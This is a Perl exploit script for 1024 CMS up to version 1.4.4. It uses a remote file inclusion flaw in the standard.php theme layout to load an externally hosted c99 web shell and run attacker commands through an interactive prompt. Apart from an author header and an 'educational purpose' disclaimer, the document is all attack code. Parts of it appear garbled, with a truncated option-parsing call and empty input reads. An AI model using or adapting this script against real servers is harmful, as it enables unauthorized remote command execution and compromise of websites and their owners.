#!/usr/bin/perl #################################################################### # 1024 CMS <= 1.4.4 Remote Command Execution with RFI (c99) Exploit # download: http://www.trebledesigns.com/1024cms.zip # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://www.hack0wn.com/ # team: Spanish Hackers Team - [SHT] # # Hack0wn Security Project!! # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # #################################################################### # # "need" allow_url_include = On && register_globals = On # # RFI vuln!: [/themes/default/layouts/standard.php] # \$help, 'vuln=s' => \$vuln, 'shell=s' => \$shell ); &banner unless ($vuln); &banner unless ($shell); &banner if $banner eq 1; chomp($vuln); chomp($shell); while (){ print "[shell]:~\$ "; chomp($cmd=); if ($cmd eq "exit" || $cmd eq "quit") { exit 0; } my $ua = LWP::UserAgent->new; $iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1"; chomp($iny); my $own = $vuln . "/themes/default/layouts/standard.php?page_include=" . $shell . $iny; chomp($own); my $req = HTTP::Request->new(GET => $own); my $res = $ua->request($req); my $con = $res->content; if ($res->is_success){ print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix); } else { print "[p0c] Exploit failed\n"; exit(1); } } # __h0__